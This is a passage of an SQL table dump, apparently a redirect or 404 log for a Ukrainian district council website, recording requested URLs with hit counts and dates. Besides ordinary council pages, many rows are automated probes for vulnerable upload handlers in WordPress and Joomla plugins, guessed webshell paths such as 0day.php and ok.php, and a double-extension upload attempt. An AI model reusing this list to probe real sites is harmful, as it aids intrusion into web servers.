00:00:00',301),(31413,'http://www.malyn-rayrada.gov.ua/index.php/1825-plan-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-20-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',27,0,'2017-10-29 16:21:15','0000-00-00 00:00:00',301),(31414,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1813-pro-vshanuvannya-pam-yati-zhertv-tragediji-virmenskogo-narodu',NULL,'','',16,0,'2017-11-01 05:06:30','0000-00-00 00:00:00',301),(31415,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1813-pro-vshanuvannya-pam-yati-zhertv-tragediji-virmenskogo-narodu?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2017-11-02 20:34:29','0000-00-00 00:00:00',301),(31416,'http://malyn-rayrada.gov.ua/b14pka33c6xmzzvenwhl6hfzbd2g',NULL,'','',1,0,'2017-11-03 21:12:37','0000-00-00 00:00:00',301),(31417,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1813-pro-vshanuvannya-pam-yati-zhertv-tragediji-virmenskogo-narodu',NULL,'','',23,0,'2017-11-07 17:05:43','0000-00-00 00:00:00',301),(31418,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/photo-gallery/filemanager/uploadhandler.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php','',1,0,'2017-11-10 15:42:33','0000-00-00 00:00:00',301),(31419,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/complete-gallery-manager/frames/upload-images.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/complete-gallery-manager/frames/upload-images.php','',1,0,'2017-11-12 04:48:14','0000-00-00 00:00:00',301),(31420,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php','',1,0,'2017-11-18 03:12:54','0000-00-00 00:00:00',301),(31421,'http://malyn-rayrada.gov.ua/wp-admin/',NULL,'http://malyn-rayrada.gov.ua','',2,0,'2017-11-21 09:16:59','0000-00-00 00:00:00',301),(31422,'http://malyn-rayrada.gov.ua/attachments/article/1838/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',1,0,'2017-11-23 18:24:19','0000-00-00 00:00:00',301),(31423,'http://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/1776-pro-timchasovij-poryadok-vidalennya-derev-ta-kushchiv-za-mezhami-naselenikh-punktiv-na-teritoriji-malinskogo-rajonu?tmpl=component&print=1&layout=default',NULL,'http://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2011-03-31-12-03-04','',1,0,'2017-11-24 13:06:49','0000-00-00 00:00:00',301),(31424,'http://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/1776-pro-timchasovij-poryadok-vidalennya-derev-ta-kushchiv-za-mezhami-naselenikh-punktiv-na-teritoriji-malinskogo-rajonu',NULL,'','',51,0,'2017-11-24 13:14:45','0000-00-00 00:00:00',301),(31425,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-easy-gallery-pro/admin/php.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-easy-gallery-pro/admin/php.php','',3,0,'2017-11-25 05:35:06','0000-00-00 00:00:00',301),(31426,'http://malyn-rayrada.gov.ua//admin',NULL,'','',1,0,'2017-11-25 20:46:29','0000-00-00 00:00:00',301),(31427,'http://malyn-rayrada.gov.ua//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',2,0,'2017-11-25 20:46:34','0000-00-00 00:00:00',301),(31428,'http://malyn-rayrada.gov.ua//media/cloud.php',NULL,'','',1,0,'2017-11-25 20:46:34','0000-00-00 00:00:00',301),(31429,'http://malyn-rayrada.gov.ua//modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'','',3,0,'2017-11-25 20:46:35','0000-00-00 00:00:00',301),(31430,'http://malyn-rayrada.gov.ua//modules/mod_simplefileuploadv1.3/elements/mds_v3.php',NULL,'','',1,0,'2017-11-25 20:46:35','0000-00-00 00:00:00',301),(31431,'http://www.malyn-rayrada.gov.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/1777-analiz-vplivu-regulyatornogo-aktu-proektu-rishennya-malinskoji-rajonnoji-radi-pro-timchasovij-poryadok-vidalennya-derev-ta-kushchiv-za-mezhami-naselenikh-punktiv-na-teritoriji-malinskoji-rajonu',NULL,'','',35,0,'2017-11-26 07:50:39','0000-00-00 00:00:00',301),(31432,'http://www.malyn-rayrada.gov.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/1776-pro-timchasovij-poryadok-vidalennya-derev-ta-kushchiv-za-mezhami-naselenikh-punktiv-na-teritoriji-malinskogo-rajonu?layout=default&print=1&tmpl=component',NULL,'','',1,0,'2017-11-26 10:01:37','0000-00-00 00:00:00',301),(31433,'http://www.malyn-rayrada.gov.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/1776-pro-timchasovij-poryadok-vidalennya-derev-ta-kushchiv-za-mezhami-naselenikh-punktiv-na-teritoriji-malinskogo-rajonu?layout=default&page&print=1&tmpl=component',NULL,'','',2,0,'2017-11-26 17:58:40','0000-00-00 00:00:00',301),(31434,'http://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/1777-analiz-vplivu-regulyatornogo-aktu-proektu-rishennya-malinskoji-rajonnoji-radi-pro-timchasovij-poryadok-vidalennya-derev-ta-kushchiv-za-mezhami-naselenikh-punktiv-na-teritoriji-malinskoji-rajonu?layout=default&print=1&tmpl=component',NULL,'','',1,0,'2017-11-26 18:39:35','0000-00-00 00:00:00',301),(31435,'http://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/1777-analiz-vplivu-regulyatornogo-aktu-proektu-rishennya-malinskoji-rajonnoji-radi-pro-timchasovij-poryadok-vidalennya-derev-ta-kushchiv-za-mezhami-naselenikh-punktiv-na-teritoriji-malinskoji-rajonu',NULL,'','',89,0,'2017-11-26 18:58:03','0000-00-00 00:00:00',301),(31436,'http://www.malyn-rayrada.gov.ua/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php','',1,0,'2017-11-28 02:11:13','0000-00-00 00:00:00',301),(31437,'http://malyn-rayrada.gov.ua/attachments/article/1858/ð£ðÿð¡ð—ð .pdf',NULL,'','',1,0,'2017-11-28 07:41:58','0000-00-00 00:00:00',301),(31438,'http://www.malyn-rayrada.gov.ua/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php','',1,0,'2017-11-30 05:18:11','0000-00-00 00:00:00',301),(31439,'http://www.malyn-rayrada.gov.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/1776-pro-timchasovij-poryadok-vidalennya-derev-ta-kushchiv-za-mezhami-naselenikh-punktiv-na-teritoriji-malinskogo-rajonu',NULL,'','',23,0,'2017-12-04 23:30:46','0000-00-00 00:00:00',301),(31440,'http://malyn-rayrada.gov.ua/admin',NULL,'http://malyn-rayrada.gov.ua/admin','',8,0,'2017-12-06 10:12:12','0000-00-00 00:00:00',301),(31441,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1849-pro-zatverdzhennya-spilnikh-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji-golovi-rajonnoji-radi',NULL,'','',39,0,'2017-12-06 21:16:50','0000-00-00 00:00:00',301),(31442,'http://malyn-rayrada.gov.ua/attachments/article/1866/ðšð¾ñˆñ‚ð¾ñ€ð¸ñ ð¸.pdf',NULL,'','',1,0,'2017-12-07 07:43:19','0000-00-00 00:00:00',301),(31443,'http://malyn-rayrada.gov.ua/index.php?option=com_user&task=register',NULL,'','',4,0,'2017-12-07 17:20:14','0000-00-00 00:00:00',301),(31444,'http://malyn-rayrada.gov.ua/index.php/joomla/other-components/registration-form',NULL,'','',4,0,'2017-12-07 17:20:14','0000-00-00 00:00:00',301),(31445,'http://malyn-rayrada.gov.ua/index.php?option=com_community&view=register',NULL,'','',4,0,'2017-12-07 17:20:17','0000-00-00 00:00:00',301),(31446,'http://malyn-rayrada.gov.ua/index.php/component/user/register.html',NULL,'','',4,0,'2017-12-07 17:20:17','0000-00-00 00:00:00',301),(31447,'http://malyn-rayrada.gov.ua/index.php/registration/registers',NULL,'','',4,0,'2017-12-07 17:20:17','0000-00-00 00:00:00',301),(31448,'http://malyn-rayrada.gov.ua/registratsiya/registers',NULL,'','',4,0,'2017-12-07 17:20:17','0000-00-00 00:00:00',301),(31449,'http://malyn-rayrada.gov.ua/component/comprofiler/registers.html',NULL,'','',4,0,'2017-12-07 17:20:17','0000-00-00 00:00:00',301),(31450,'http://malyn-rayrada.gov.ua/user/registration',NULL,'','',4,0,'2017-12-07 17:20:17','0000-00-00 00:00:00',301),(31451,'http://malyn-rayrada.gov.ua/index.php?option=com_secureregistration&task=register',NULL,'','',4,0,'2017-12-07 17:20:18','0000-00-00 00:00:00',301),(31452,'http://malyn-rayrada.gov.ua/component/option,com_comprofiler/task,registers/',NULL,'','',4,0,'2017-12-07 17:20:19','0000-00-00 00:00:00',301),(31453,'http://malyn-rayrada.gov.ua/index.php?option=com_registration&task=register',NULL,'','',4,0,'2017-12-07 17:20:19','0000-00-00 00:00:00',301),(31454,'http://malyn-rayrada.gov.ua/index.php?option=com_comprofiler&task=registers',NULL,'','',8,0,'2017-12-07 17:20:19','0000-00-00 00:00:00',301),(31455,'http://malyn-rayrada.gov.ua/index.php?option=com_joocm&view=register',NULL,'','',4,0,'2017-12-07 17:20:19','0000-00-00 00:00:00',301),(31456,'http://malyn-rayrada.gov.ua/index.php?option=com_easysocial&view=registration',NULL,'','',6,0,'2017-12-07 17:20:20','0000-00-00 00:00:00',301),(31457,'http://malyn-rayrada.gov.ua/registration',NULL,'','',4,0,'2017-12-07 17:20:20','0000-00-00 00:00:00',301),(31458,'http://malyn-rayrada.gov.ua/index.php?option=com_user&view=register',NULL,'','',4,0,'2017-12-07 17:20:20','0000-00-00 00:00:00',301),(31459,'http://www.malyn-rayrada.gov.ua/attachments/article/1788/ñ€ðµð¹ñ‚ð¸ð½ð³ ð¿ðµñ€ñˆðµ ð¿ñ–ð²ñ€ñ–ñ‡ñ‡ñ 2017.pdf',NULL,'','',3,0,'2017-12-08 16:57:52','0000-00-00 00:00:00',301),(31460,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1849-pro-zatverdzhennya-spilnikh-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji-golovi-rajonnoji-radi?layout=default&print=1&tmpl=component',NULL,'','',2,0,'2017-12-13 00:08:19','0000-00-00 00:00:00',301),(31461,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1849-pro-zatverdzhennya-spilnikh-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji-golovi-rajonnoji-radi',NULL,'','',17,0,'2017-12-13 01:33:54','0000-00-00 00:00:00',301),(31462,'http://www.malyn-rayrada.gov.ua/theme/assets/global/plugins/jquery-file-upload/server/php/',NULL,'http://www.malyn-rayrada.gov.ua/theme/assets/global/plugins/jquery-file-upload/server/php/','',4,0,'2017-12-15 10:47:41','0000-00-00 00:00:00',301),(31463,'http://malyn-rayrada.gov.ua/far.php',NULL,'','',2,0,'2017-12-16 21:29:13','0000-00-00 00:00:00',301),(31464,'http://malyn-rayrada.gov.ua/rep.php',NULL,'','',2,0,'2017-12-16 21:29:14','0000-00-00 00:00:00',301),(31465,'http://malyn-rayrada.gov.ua/replace.php',NULL,'','',2,0,'2017-12-16 21:29:14','0000-00-00 00:00:00',301),(31466,'http://malyn-rayrada.gov.ua/tools/replace.php',NULL,'','',1,0,'2017-12-16 21:29:15','0000-00-00 00:00:00',301),(31467,'http://malyn-rayrada.gov.ua/index.php/1871-do-vidoma-deputativ-rajonnoji-radi-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-21-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',26,0,'2017-12-17 02:26:26','0000-00-00 00:00:00',301),(31468,'http://malyn-rayrada.gov.ua/attachments/article/1866/ðšð¾ñˆñ‚ð¾ñ€ð¸ñð¸.pdf',NULL,'','',11,0,'2017-12-17 10:24:59','0000-00-00 00:00:00',301),(31469,'http://www.malyn-rayrada.gov.ua/index.php/1871-do-vidoma-deputativ-rajonnoji-radi-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-21-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',5,0,'2017-12-18 09:39:16','0000-00-00 00:00:00',301),(31470,'http://www.malyn-rayrada.gov.ua/attachments/article/1883/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  21-7.pdf',NULL,'','',1,0,'2017-12-20 05:21:10','0000-00-00 00:00:00',301),(31471,'http://malyn-rayrada.gov.ua/index.php/1888-do-pensioneriv',NULL,'','',31,0,'2017-12-22 22:19:03','0000-00-00 00:00:00',301),(31472,'http://www.malyn-rayrada.gov.ua/index.php/1888-do-pensioneriv',NULL,'','',14,0,'2017-12-23 23:56:38','0000-00-00 00:00:00',301),(31473,'http://www.malyn-rayrada.gov.ua/wp-content/themes/rayoflight/functions/upload-handler.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/themes/rayoflight/functions/upload-handler.php','',1,0,'2017-12-28 00:44:16','0000-00-00 00:00:00',301),(31474,'http://www.malyn-rayrada.gov.ua/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php','',1,0,'2017-12-28 09:42:02','0000-00-00 00:00:00',301),(31475,'http://malyn-rayrada.gov.ua/attachments/article/1883/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  21-7.pdf',NULL,'','',1,0,'2017-12-29 19:10:51','0000-00-00 00:00:00',301),(31476,'http://malyn-rayrada.gov.ua/wp-content/plugins/font-uploader/font-upload.php',NULL,'','',2,0,'2017-12-31 16:56:20','0000-00-00 00:00:00',301),(31477,'http://malyn-rayrada.gov.ua/wp-content/plugins/mailpress/mp-includes/action.php',NULL,'','',2,0,'2017-12-31 16:56:23','0000-00-00 00:00:00',301),(31478,'http://malyn-rayrada.gov.ua/wp-content/plugins/real3d-flipbook/includes/process.php',NULL,'','',1,0,'2017-12-31 16:56:29','0000-00-00 00:00:00',301),(31479,'http://malyn-rayrada.gov.ua/wp-content/plugins/codecanyon-157782-video-gallery-wordpress-plugin-w-youtube-vimeo-/upload.php',NULL,'','',3,0,'2017-12-31 16:56:32','0000-00-00 00:00:00',301),(31480,'http://malyn-rayrada.gov.ua/wp-content/plugins/contus-hd-flv-player/uploadvideo.php',NULL,'','',1,0,'2017-12-31 16:56:40','0000-00-00 00:00:00',301),(31481,'http://malyn-rayrada.gov.ua/wp-content/plugins/sharexy/ajaxresponder.php',NULL,'','',2,0,'2017-12-31 16:56:41','0000-00-00 00:00:00',301),(31482,'http://malyn-rayrada.gov.ua/wp-content/plugins/dzs-portfolio/admin/upload.php',NULL,'','',4,0,'2017-12-31 16:56:45','0000-00-00 00:00:00',301),(31483,'http://malyn-rayrada.gov.ua/wp-content/plugins/codecanyon-157782-video-gallery-wordpress-plugin-w-youtube-vimeo-/admin/upload.php',NULL,'','',1,0,'2017-12-31 16:56:46','0000-00-00 00:00:00',301),(31484,'http://malyn-rayrada.gov.ua/wp-admin/admin-post.php?task=wpmp_upload_previews',NULL,'','',2,0,'2017-12-31 16:56:50','0000-00-00 00:00:00',301),(31485,'http://malyn-rayrada.gov.ua/wp-content/plugins/dzs-videogallery/upload.php',NULL,'','',2,0,'2017-12-31 16:56:54','0000-00-00 00:00:00',301),(31486,'http://malyn-rayrada.gov.ua/wp-content/plugins/uploader/uploadify/uploadify.php',NULL,'','',1,0,'2017-12-31 16:56:57','0000-00-00 00:00:00',301),(31487,'http://malyn-rayrada.gov.ua/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php',NULL,'','',1,0,'2017-12-31 16:57:00','0000-00-00 00:00:00',301),(31488,'http://malyn-rayrada.gov.ua/wp-content/plugins/gallery-slider/register.php',NULL,'','',2,0,'2017-12-31 16:57:00','0000-00-00 00:00:00',301),(31489,'http://malyn-rayrada.gov.ua/wp-content/plugins/tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php',NULL,'','',1,0,'2017-12-31 16:57:04','0000-00-00 00:00:00',301),(31490,'http://malyn-rayrada.gov.ua/wp-content/plugins/dzs-videogallery/admin/upload.php',NULL,'','',3,0,'2017-12-31 16:57:07','0000-00-00 00:00:00',301),(31491,'http://malyn-rayrada.gov.ua/wp-content/plugins/dzs-portfolio/upload.php',NULL,'','',4,0,'2017-12-31 16:57:23','0000-00-00 00:00:00',301),(31492,'http://malyn-rayrada.gov.ua/wp-content/plugins/gallery-plugin/upload/php.php',NULL,'','',1,0,'2017-12-31 16:57:29','0000-00-00 00:00:00',301),(31493,'http://malyn-rayrada.gov.ua/wp-admin/plugin-editor.php?file=userpro/functions/_trial.php&plugin=userpro/index.php',NULL,'','',1,0,'2017-12-31 16:57:56','0000-00-00 00:00:00',301),(31494,'http://malyn-rayrada.gov.ua/components/com_foxcontact/_func.php',NULL,'http://malyn-rayrada.gov.ua/components/com_foxcontact/_func.php','',3,0,'2018-01-04 02:43:47','0000-00-00 00:00:00',301),(31495,'http://www.malyn-rayrada.gov.ua/components/com_foxcontact/_func.php',NULL,'http://www.malyn-rayrada.gov.ua/components/com_foxcontact/_func.php','',2,0,'2018-01-04 02:44:51','0000-00-00 00:00:00',301),(31496,'http://malyn-rayrada.gov.ua/0day.php',NULL,'http://malyn-rayrada.gov.ua/0day.php','',1,0,'2018-01-05 02:43:17','0000-00-00 00:00:00',301),(31497,'http://www.malyn-rayrada.gov.ua/0day.php',NULL,'http://www.malyn-rayrada.gov.ua/0day.php','',1,0,'2018-01-05 02:44:14','0000-00-00 00:00:00',301),(31498,'http://www.malyn-rayrada.gov.ua/index.php/1791-pro-sklikannya-19-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-01-06 05:16:56','0000-00-00 00:00:00',301),(31499,'http://malyn-rayrada.gov.ua/wp-content/plugins/wp-handy-lightbox/begin.php',NULL,'','',1,0,'2018-01-06 10:16:48','0000-00-00 00:00:00',301),(31500,'http://malyn-rayrada.gov.ua/modules/fieldvmegamenu/ajax/upload.php',NULL,'','',1,0,'2018-01-06 10:16:56','0000-00-00 00:00:00',301),(31501,'http://malyn-rayrada.gov.ua/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'','',1,0,'2018-01-06 10:17:07','0000-00-00 00:00:00',301),(31502,'http://malyn-rayrada.gov.ua/modules/homepageadvertise2/uploadimage.php',NULL,'','',2,0,'2018-01-06 10:17:23','0000-00-00 00:00:00',301),(31503,'http://www.malyn-rayrada.gov.ua/index.php/1791-pro-sklikannya-19-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',19,0,'2018-01-06 13:20:49','0000-00-00 00:00:00',301),(31504,'http://malyn-rayrada.gov.ua/index.php/1791-pro-sklikannya-19-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',39,0,'2018-01-06 14:11:09','0000-00-00 00:00:00',301),(31505,'http://malyn-rayrada.gov.ua/modules/megamenu/uploadify/uploadify.php?id=kzvzo.php.png',NULL,'','',1,0,'2018-01-07 15:40:55','0000-00-00 00:00:00',301),(31506,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php','',1,0,'2018-01-09 10:23:42','0000-00-00 00:00:00',301),(31507,'http://malyn-rayrada.gov.ua/wp-content/uploads/wysija/themes/ok/ok.php',NULL,'','',1,0,'2018-01-09 16:52:33','0000-00-00 00:00:00',301),(31508,'http://www.malyn-rayrada.gov.ua/wp-content/themes/thisway/includes/uploadify/upload_settings_image.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php','',1,0,'2018-01-11 12:13:07','0000-00-00 00:00:00',301),(31509,'http://malyn-rayrada.gov.ua/index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',4,0,'2018-01-13 23:31:41','0000-00-00 00:00:00',301),(31510,'http://malyn-rayrada.gov.ua/attachments/article/1795/%d0%bf%d1%96%d0%b4%d1%81%d1%83%d0%bc%d0%ba%d0%b8%20%d0%b2%d1%96%d0%b4%d0%ba%d1%80%d0%b8%d1%82%d0%be%d0%b3%d0%be%20%d0%b3%d0%be%d0%bb%d0%be%d1%81%d1%83%d0%b2%d0%b0%d0%bd%d0%bd%d1%8f.pdf',NULL,'','',1,0,'2018-01-18 01:03:06','0000-00-00 00:00:00',301),(31511,'http://www.malyn-rayrada.gov.ua/index.php/1805-pro-sklikannya-20-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',15,0,'2018-01-18 19:37:17','0000-00-00 00:00:00',301),(31512,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/gravityforms/',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/gravityforms/','',1,0,'2018-01-19 09:00:42','0000-00-00 00:00:00',301),(31513,'http://malyn-rayrada.gov.ua/index.php/1805-pro-sklikannya-20-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',31,0,'2018-01-21 03:47:24','0000-00-00 00:00:00',301),(31514,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/project.ziplast/uploader/server/php/files/',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/project.ziplast/uploader/server/php/files/','',1,0,'2018-01-21 07:56:03','0000-00-00 00:00:00',301),(31515,'http://www.malyn-rayrada.gov.ua/upload/server/php/',NULL,'http://www.malyn-rayrada.gov.ua/upload/server/php/','',1,0,'2018-01-23 13:31:05','0000-00-00 00:00:00',301),(31516,'http://malyn-rayrada.gov.ua/reed',NULL,'','',1,0,'2018-01-23 17:40:40','0000-00-00 00:00:00',301),(31517,'http://malyn-rayrada.gov.ua/rss',NULL,'','',1,0,'2018-01-23 17:40:49','0000-00-00 00:00:00',301),(31518,'http://malyn-rayrada.gov.ua//index.php?format=feed&type=rss',NULL,'','',2,0,'2018-01-23 17:46:04','0000-00-00 00:00:00',301),(31519,'http://malyn-rayrada.gov.ua//index.php?format=feed&type=atom',NULL,'','',1,0,'2018-01-23 17:46:10','0000-00-00 00:00:00',301),(31520,'http://www.malyn-rayrada.gov.ua/jquery-file-upload/server/php/',NULL,'http://www.malyn-rayrada.gov.ua/jquery-file-upload/server/php/','',1,0,'2018-01-26 08:58:59','0000-00-00 00:00:00',301),(31521,'http://www.malyn-rayrada.gov.ua/klfhsyys',NULL,'','',1,0,'2018-01-29 12:09:30','0000-00-00 00:00:00',301),(31522,'http://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01',NULL,'','',5,0,'2018-01-31 00:41:45','0000-00-00 00:00:00',301),(31523,'http://malyn-rayrada.gov.ua//components/com_b2jcontact/b2jcontact.php',NULL,'','',2,0,'2018-02-01 03:40:14','0000-00-00 00:00:00',301),(31524,'http://www.malyn-rayrada.gov.ua//components/com_b2jcontact/b2jcontact.php',NULL,'','',2,0,'2018-02-01 03:41:13','0000-00-00 00:00:00',301),(31525,'http://malyn-rayrada.gov.ua//components/com_foxcontact/foxcontact.php',NULL,'','',1,0,'2018-02-01 04:07:26','0000-00-00 00:00:00',301),(31526,'http://www.malyn-rayrada.gov.ua//components/com_foxcontact/foxcontact.php',NULL,'','',1,0,'2018-02-01 04:08:13','0000-00-00 00:00:00',301),(31527,'http://malyn-rayrada.gov.ua//index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',1,0,'2018-02-01 04:45:28','0000-00-00 00:00:00',301),(31528,'http://www.malyn-rayrada.gov.ua//index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',1,0,'2018-02-01 04:46:25','0000-00-00 00:00:00',301),(31529,'http://www.malyn-rayrada.gov.ua/server/php/',NULL,'http://www.malyn-rayrada.gov.ua/server/php/','',1,0,'2018-02-01 21:21:49','0000-00-00 00:00:00',301),(31530,'http://malyn-rayrada.gov.ua/attachments/article/1914/ð ð‘ðš.pdf',NULL,'','',3,0,'2018-02-06 05:53:00','0000-00-00 00:00:00',301),(31531,'http://malyn-rayrada.gov.ua/attachments/article/1914/ð¦ð ð‘.pdf',NULL,'','',3,0,'2018-02-06 08:48:24','0000-00-00 00:00:00',301),(31532,'http://malyn-rayrada.gov.ua/connectors/system/settings.php',NULL,'','',1,0,'2018-02-10 03:04:29','0000-00-00 00:00:00',301),(31533,'http://malyn-rayrada.gov.ua/attachments/article/1919/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð³ð¾ð»ð¾ñ  22 ñ ðµñ ñ–ñ  02.02.2018.pdf',NULL,'','',1,0,'2018-02-10 19:24:54','0000-00-00 00:00:00',301),(31534,'http://malyn-rayrada.gov.ua/wp-load.php',NULL,'','',3,0,'2018-02-13 02:39:51','0000-00-00 00:00:00',301),(31535,'http://malyn-rayrada.gov.ua/xmlrpz.php',NULL,'','',4,0,'2018-02-13 14:28:27','0000-00-00 00:00:00',301),(31536,'http://malyn-rayrada.gov.ua/connectors/security/login.php',NULL,'','',1,0,'2018-02-15 05:51:45','0000-00-00 00:00:00',301),(31537,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01',NULL,'','',4,0,'2018-02-16 23:58:07','0000-00-00 00:00:00',301),(31538,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1913-pro-zatverdzhennya-shtatnikh-rozpisiv-komunalnikh-zakladiv-kulturi-rajonu',NULL,'','',7,0,'2018-02-18 04:12:53','0000-00-00 00:00:00',301),(31539,'http://malyn-rayrada.gov.ua/consystem.php',NULL,'','',2,0,'2018-02-18 12:55:36','0000-00-00 00:00:00',301),(31540,'http://malyn-rayrada.gov.ua/index.php/1949-deputati-oblasnoji-radi-zaproshuyut-do-pereglyadu-filmu-kiborgi',NULL,'','',8,0,'2018-02-21 21:48:22','0000-00-00 00:00:00',301),(31541,'http://malyn-rayrada.gov.ua/modules/homepageadvertise/uploadimage.php',NULL,'','',1,0,'2018-02-28 05:39:59','0000-00-00 00:00:00',301),(31542,'http://malyn-rayrada.gov.ua/modules/vtemslideshow/uploadimage.php',NULL,'','',1,0,'2018-02-28 05:40:18','0000-00-00 00:00:00',301),(31543,'http://malyn-rayrada.gov.ua/wp-content/plugins/simple-dropbox-upload-form/dragup/',NULL,'','',1,0,'2018-02-28 05:40:22','0000-00-00 00:00:00',301),(31544,'http://malyn-rayrada.gov.ua/wp-admin/post.php?task=wpdm_upload_files',NULL,'','',1,0,'2018-02-28 05:40:45','0000-00-00 00:00:00',301),(31545,'http://malyn-rayrada.gov.ua/wp-content/plugins/page-google-maps/pr.php',NULL,'','',1,0,'2018-02-28 05:40:54','0000-00-00 00:00:00',301),(31546,'http://malyn-rayrada.gov.ua/wp-content/plugins/google-maps-by-daniel-martyn/inuse.php',NULL,'','',1,0,'2018-02-28 05:41:06','0000-00-00 00:00:00',301),(31547,'http://malyn-rayrada.gov.ua/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php',NULL,'','',1,0,'2018-02-28 05:41:20','0000-00-00 00:00:00',301),(31548,'http://malyn-rayrada.gov.ua/wp-content/uploads/aapl/loaders/0sig8.php',NULL,'','',1,0,'2018-02-28 05:45:27','0000-00-00 00:00:00',301),(31549,'http://malyn-rayrada.gov.ua/components/com_sexycontactform/assets/js/index.html',NULL,'','',9,0,'2018-03-04 21:31:17','0000-00-00 00:00:00',301),(31550,'http://malyn-rayrada.gov.ua/blog/xmlrpc.php',NULL,'','',3,0,'2018-03-04 22:47:18','0000-00-00 00:00:00',301),(31551,'http://malyn-rayrada.gov.ua/customer/account/create/',NULL,'','',1,0,'2018-03-07 09:13:10','0000-00-00 00:00:00',301),(31552,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/favicon.ico',NULL,'','',2,0,'2018-03-08 17:00:06','0000-00-00 00:00:00',301),(31553,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/formcraft/file-upload/server/php/upload.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/formcraft/file-upload/server/php/upload.php','',1,0,'2018-03-11 14:41:48','0000-00-00 00:00:00',301),(31554,'http://malyn-rayrada.gov.ua/index.php?option=com_easybookreloaded',NULL,'','',2,0,'2018-03-12 16:00:41','0000-00-00 